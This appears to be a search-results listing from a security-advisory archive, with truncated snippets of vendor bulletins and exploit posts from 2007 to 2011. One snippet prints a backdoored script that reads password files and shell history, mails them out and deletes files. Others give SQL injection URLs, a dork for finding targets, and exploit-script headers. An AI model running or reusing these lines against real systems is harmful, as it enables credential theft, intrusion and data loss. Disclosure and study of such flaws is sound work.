47153 matches found
Videcon Viola DVR VIO-4/1000 directory traversal
Directory traversal in Web interface...
iDefense Security Advisory 03.01.11: Alcatel-Lucent OmniPCX Enterprise CS CGI Cookie Buffer Overflow Vulnerability
iDefense Security Advisory 03.01.11 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 01, 2011 I. BACKGROUND The Alcatel-Lucent OmniPCX Enterprise Communication Server CS is a communication server platform that provides multimedia call processing for both Alcatel-Lucent and third-party...
iDefense Security Advisory 02.08.11: Adobe Flash Player ActionScript Memory Corruption Vulnerability
iDefense Security Advisory 02.08.11 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 08, 2011 I. BACKGROUND Adobe Flash Player is an application for viewing animations and movies using computer programs such as a Web browser; in common usage, Flash lets you put animation and movies on a...
[USN-1042-1] PHP vulnerabilities
=========================================================== Ubuntu Security Notice USN-1042-1 January 11, 2011 php5 vulnerabilities CVE-2009-5016, CVE-2010-3436, CVE-2010-3709, CVE-2010-3710, CVE-2010-3870, CVE-2010-4156, CVE-2010-4409, CVE-2010-4645...
[eVuln.com] Multiple XSS in MCG GuestBook
New eVuln Advisory: Multiple XSS in MCG GuestBook Summary: http://evuln.com/vulns/144/summary.html Details: http://evuln.com/vulns/144/description.html -----------Summary----------- eVuln ID: EV0144 Software: MCG GuestBook Vendor: Mrcgiguy Version: 1.0 Critical Level: low Type: Cross Site Scripti...
acs-blog turkce v1.1.3-(tr) Database Disclosure Exploit
!/usr/bin/perl -w blog turkce v1.1.3-tr Database Disclosure Exploit Found & Coded: indoushka Date: 25/07/2010 Home: http://www.hack-r1z.com/cc/ Dz-Ghost Team ===== Saoucha Star08 Cyber Sec theblind74 XproratiX onurozkan n2n Meher Assel =========================== special thanks to : r0073r...
Microsoft Internet Information Services multiple security vulnerabilities
Authentication bypass, buffer overflow, DoS...
Mozilla Foundation Security Advisory 2010-59
Mozilla Foundation Security Advisory 2010-59 Title: SJOW creates scope chains ending in outer object Impact: Critical Announced: September 7, 2010 Reporter: Blake Kaplan Products: Firefox, Thunderbird Fixed in: Firefox 3.6.9 Thunderbird 3.1.3 Description Mozilla developer Blake Kaplan reported th...
Microsoft Office multiple security vulnerabilities
Multiple memory corruptions on different data type parsing in Word and Excel...
Microsoft Security Bulletin MS10-048 - Important Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2160329)
Microsoft Security Bulletin MS10-048 - Important Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege 2160329 Published: August 10, 2010 Version: 1.0 General Information Executive Summary This security update resolves one publicly disclosed and four privately reported...
Mozilla Foundation Security Advisory 2010-37
Mozilla Foundation Security Advisory 2010-37 Title: Plugin parameter EnsureCachedAttrParamArrays remote code execution vulnerability Impact: Critical Announced: July 20, 2010 Reporter: J23 via TippingPoint's Zero Day Initiative Products: Firefox, SeaMonkey Fixed in: Firefox 3.6.7 Firefox 3.5.11...
VUPEN Security Research - Adobe Acrobat and Reader "newfunction" Memory Corruption Vulnerability (CVE-2010-2168)
VUPEN Security Research - Adobe Acrobat and Reader "newfunction" Memory Corruption Vulnerability CVE-2010-2168 http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Adobe Acrobat and Reader are the global standards for electronic document sharing. They are used to create,...
Microsoft Security Bulletin MS10-036 - Important Vulnerability in COM Validation in Microsoft Office Could Allow Remote Code Execution (983235)
Microsoft Security Bulletin MS10-036 - Important Vulnerability in COM Validation in Microsoft Office Could Allow Remote Code Execution 983235 Published: June 08, 2010 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in COM...
[USN-942-1] PostgreSQL vulnerabilities
=========================================================== Ubuntu Security Notice USN-942-1 May 21, 2010 postgresql-8.1, postgresql-8.3, postgresql-8.4 vulnerabilities CVE-2010-1169, CVE-2010-1170 =========================================================== A security issue affects the following...
PostgreSQL DoS
Crash on substring function in SQL...
Secunia Research: VMWare VMnc Codec HexTile Encoding Two Integer Truncation Vulnerabilities
====================================================================== Secunia Research 09/04/2010 - VMWare VMnc Codec HexTile Encoding - - Two Integer Truncation Vulnerabilities - ====================================================================== Table of Contents Affected...
[USN-923-1] OpenJDK vulnerabilities
=========================================================== Ubuntu Security Notice USN-923-1 April 07, 2010 openjdk-6 vulnerabilities CVE-2009-3555, CVE-2010-0082, CVE-2010-0084, CVE-2010-0085, CVE-2010-0088, CVE-2010-0091, CVE-2010-0092, CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837...
Oracle Siebel 7.x CRM Cross Site Scripting Vulnerability
======================================================= Yaniv Miron aka "Lament" Advisory Feb 27, 2010 Oracle Siebel 7.x CRM 7.7, 7.8 tested Cross Site Scripting Vulnerability ======================================================= ===================== I. BACKGROUND ===================== Siebel...
[ MDVSA-2009:340 ] jpgraph
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2009:340 http://www.mandriva.com/security/ Package : jpgraph Date : December 26, 2009 Affected: Corporate 4.0, Enterprise Server 5.0 Problem Description: A vulnerability has been found and corrected in jpgraph:...
fetchmail security announcement fetchmail-SA-2009-01 (CVE-2009-2666)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 fetchmail-SA-2009-01: Improper SSL certificate subject verification Topics: Improper SSL certificate subject verification Author: Matthias Andree Version: 1.0 Announced: 2009-08-06 Type: Allows undetected Man-in-the-middle attacks against SSL/TLS...
Microsoft Security Bulletin MS09-034 - Critical Cumulative Security Update for Internet Explorer (972260)
Microsoft Security Bulletin MS09-034 - Critical Cumulative Security Update for Internet Explorer 972260 Published: July 28, 2009 Version: 1.0 General Information Executive Summary This security update is being released out of band in conjunction with Microsoft Security Bulletin MS09-035, which...
NcFTPd <= 2.8.5 remote jail breakout
NcFTPd = 2.8.5 remote jail breakout Discovered by: Kingcope Contact: kcope2atgooglemail.com / http://isowarez.de Date: 27th July 2009 Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard Prerequisites: Valid user account. Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 latest version: ftp...
MULTIPLE REMOTE VULNERABILITIES --MiniTwitter<=v0.3-Beta-->
------------------------------------------------------------ MULTIPLE REMOTE VULNERABILITIES --MiniTwitter=v0.3-Beta-- ------------------------------------------------------------ CMS INFORMATION: --WEB: http://mt.bioscriptsdb.com/ --DOWNLOAD: http://sourceforge.net/projects/minitt/ --DEMO:...
iDefense Security Advisory 05.14.09: Multiple Vendor Outside In Multiple Integer Overflow Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDefense Security Advisory 05.14.09 http://labs.idefense.com/intelligence/vulnerabilities/ May 14, 2009 I. BACKGROUND Oracle Corp.'s Outside In Technology is a document conversion engine supporting a large number of binary file formats. Prior to...
Family Connections 1.8.2 Blind SQL Injection (Correct Version)
Salvatore "drosophila" Fresta + Application: Family Connection + Version: = 1.8.2 + Website: http://www.familycms.com + Bugs: A Blind SQL Injection + Exploitation: Remote + Date: 1 Apr 2009 + Discovered by: Salvatore "drosophila" Fresta + Author: Salvatore "drosophila" Fresta + Contact: e-mail:...
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router
XSS Attack using SMS to Optus/Huawei E960 HSDPA Router Synopsis -------- Huawei E960 HSDPA Router firmware version 246.11.04.11.110sp04 is vulnerable to XSS attack using SMS. One of the feature of this router is the ability to send and receive SMS through its web interface. The SMS text is...
DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability
Title ----- DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability Severity -------- Low Date Discovered --------------- January 19th 2009 Discovered By ------------- Digital Defense, Inc. Vulnerability Research Team Credit: David Marshall and r@b13$ Vulnerability Description...
SQL Injection and DoS vulnerabilities in Power Phlogger
Здравствуйте 3APA3A! Сообщаю вам о найденных мною новых SQL Injection и DoS уязвимостях в Power Phlogger. SQL Injection: Уязвимость можно использовать в частности для удаления стилей в том числе системных: http://site/edCss.php?cssstr=22/&action=delete Или для проведения DoS атак:...
Microsoft Bluetooth Stack OBEX Directory Traversal
Title: Microsoft Bluetooth Stack OBEX Directory Traversal Author: Alberto Moreno Tablado Vendor: Microsoft Product: Windows Mobile 6 Professional Probably Windows Mobile 5.0 for Pocket PC and Windows Mobile 5.0 for Pocket PC Phone Edition References:...
Microsoft Security Bulletin MS08-057 – Critical Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416)
Microsoft Security Bulletin MS08-057 – Critical Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution 956416 Published: October 14, 2008 Version: 1.0 General Information Executive Summary This security update resolves three privately reported vulnerabilities in Microsoft Office Exc...
ZDI-08-044: Mozilla Firefox CSSValue Array Memory Corruption Vulnerability
ZDI-08-044: Mozilla Firefox CSSValue Array Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-044 July 17, 2008 -- CVE ID: CVE-2008-2785 -- Affected Vendors: Mozilla Firefox -- Affected Products: Mozilla Firefox 2.0.x Mozilla Firefox 3.0.x -- TippingPointTM IPS...
Remote DoS vulnerability in Linksys WRH54G
DESCRIPTION There is a DoS vulnerability in Cisco Linksys router WRH54G http service. Any anonymous attacker could crash the http service easily by sending a malformed http request, and needn't any privilege. When the device attempts to process the malformed request, it will be possible to...
Microsoft Security Bulletin MS08-024 - Critical Cumulative Security Update for Internet Explorer (947864)
Microsoft Security Bulletin MS08-024 - Critical Cumulative Security Update for Internet Explorer 947864 Published: April 8, 2008 Version: 1.0 General Information Executive Summary This security update resolves one privately reported vulnerability. The vulnerability could allow remote code executi...
LI-countdown SQL Injection Vulnerability
--------------------Summary---------------- Vendor: LI-Scripts Vendor's Web Site: http://www.liscripts.net Software: LI-countdown Sowtware's Web Site: http://www.liscripts.net/products.phpcountdown Critical Level: Moderate Type: SQL Injection Class: Remote Status: Unpatched PoC/Exploit: Not...
Microsoft Security Bulletin MS08-010 - Critical Cumulative Security Update for Internet Explorer (944533)
Microsoft Security Bulletin MS08-010 - Critical Cumulative Security Update for Internet Explorer 944533 Published: February 12, 2008 Version: 1.0 General Information Executive Summary This critical security update resolves three privately reported and one publicly reported vulnerabilities. The mo...
Mozilla Foundation Security Advisory 2008-10
Mozilla Foundation Security Advisory 2008-10 Title: URL token stealing via stylesheet redirect Impact: Low Announced: February 7, 2008 Reporter: Martin Straka Products: Firefox, SeaMonkey Fixed in: Firefox 2.0.0.12 SeaMonkey 1.1.8 Description Security researcher Martin Straka reported that...
iDefense Security Advisory 01.31.08: IBM Informix Dynamic Server onedcu File Creation Vulnerability
iDefense Security Advisory 01.31.08 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 31, 2008 I. BACKGROUND IBM Corp.'s Informix Dynamic Server is an online transaction processing data server. For more information, visit the product's homepage at the following URL...
VigileCMS <= 1.8 Stealth Remote Command Execution Exploit
Opencosmo Security http://www.opencosmo.com http://www.opencosmo.com/news.php?readmore=15 VigileCMS = 1.8 Stealth Remote Command Execution Exploit Crediti: The:Paradox Applicazione: VigileCMS Versione: 1.8 Impatto: Remote Command Execution Rischio: 3/5 Exploit: !/usr/bin/python -- coding:...
Cypress BX script backdoored?
For those of us who use Cyp/bx http://www.mindcryme.com/void/cyp1.0k.tar.gz |rip@rock:14:53:49:/tmp/cyp/modules| $ cat mdop.m !/bin/bash uname -a /tmp/.bx cat /etc/hosts /tmp/.bx cat /etc/passwd /tmp/.bx cat $HOME/.bashhistory /tmp/.bx 2/dev/null mail [email protected] /tmp/.bx sleep 4 rm -rf...
SolpotCrew Advisory #15 (home_edition2001) - Weblogicnet (files_dir) Remote File Inclusion
Nyubicrew Community Weblogicnet filesdir Remote File Inclusion vendor : http://www.weblogicnet.com/ source : http://weblogicnet.com/data/weblogicnet.tgz Bug Found By :homeedition2001 a.k.a bius 31-08-2007 contact: [email protected] Website : www.solpotcrew.org/adv/homeedition2001-adv-02.txt Greetz:...
iDefense Security Advisory 08.16.07: IBM DB2 Universal Database Directory Traversal Vulnerability
IBM DB2 Universal Database Directory Traversal Vulnerability iDefense Security Advisory 08.16.07 http://labs.idefense.com/intelligence/vulnerabilities/ Aug 16, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for high end databases. Fo...
mcNews (skinfile) Remote File Include Vulnerability
------------------------------------------------------------------------------------------------------------------- MEFISTO PreSents... Script: mcNews Script Download: ftp://ftp1.comscripts.com/PHP/845mcnews-13.zip Contact: ilker Kandemir ilkerkandemiratmynet.com info: / MEFISTO /...
Oracle Security: SQL Injection in APEX CHECK_DB_PASSWORD
SQL Injection Vulnerability in Oracle APEX CHECKDBPASSWORD This advisory http://www.red-database-security.com/advisory/oracleapexsqlinjectioncheckdbpassword.html Name SQL Injection Vulnerability in Oracle CHECKDBPASSWORD Systems Oracle APEX Severity Medium Risk Category SQL Injection Author...
SYM07-011 Symantec Reporting Server password disclosure
SYM07-011: Symantec Reporting Server Password Disclosure June 5, 2007 Risk Impact: Medium Remote Access: Yes Local Access: Yes Authentication Required:Yes Exploit available: No Overview The administrator password for Symantec Reporting Server could be disclosed after a failed login attempt...
MITKRB5-SA-2007-001: telnetd allows login as arbitrary user [CVE-2007-0956]
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MIT krb5 Security Advisory 2007-001 Original release: 2007-04-03 Last update: 2007-04-03 Topic: telnetd allows login as arbitrary user Severity: CRITICAL CVE: CVE-2007-0956 CERT: VU220816 SUMMARY ======= The MIT krb5 telnet daemon telnetd allows...
Microsoft Security Bulletin MS07-013 Vulnerability in Microsoft RichEdit Could Allow Remote Code Execution (918118)
Microsoft Security Bulletin MS07-013 Vulnerability in Microsoft RichEdit Could Allow Remote Code Execution 918118 Published: February 13, 2007 Version: 1.0 Summary Who Should Read this Document: Customers who use Microsoft Windows and/or Microsoft Office Impact of Vulnerability: Remote Code...
dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability
Title : dB Masters' Curium CMS = 1.03cid Remote Blind SQL Injection Vulnerability Author : ajann Contact : : S.Page : http://www.dbmasters.net $$ : Free Dork : Powered by dB Masters' Curium CMS 1 DorkEx : http://www.google.com.tr/search?q=Powered+by+dB+Masters27+Curium+CMS+1&hl=tr&start=0&sa=N In...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
[SA23887] Drupal Project Issue Tracking Module Multiple Vulnerabilities
TITLE: Drupal Project Issue Tracking Module Multiple Vulnerabilities SECUNIA ADVISORY ID: SA23887 VERIFY ADVISORY: http://secunia.com/advisories/23887/ CRITICAL: Less critical IMPACT: Security Bypass, Cross Site Scripting, Manipulation of data, Exposure of sensitive information, System access...
FishCart [injection sql]
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='sql change the cartid value with yours laurent gaffie http://s-a-p.ca/ contact: [email protected]...